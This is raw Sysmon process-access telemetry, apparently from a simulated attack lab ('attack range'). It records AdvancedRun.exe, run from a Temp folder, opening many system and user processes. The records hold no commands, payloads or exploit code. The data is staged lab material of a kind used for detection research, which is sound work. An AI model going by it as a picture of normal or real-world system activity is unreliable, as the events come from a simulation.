20:08:57.663{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.662{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067474Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.661{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067473Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067472Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067471Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 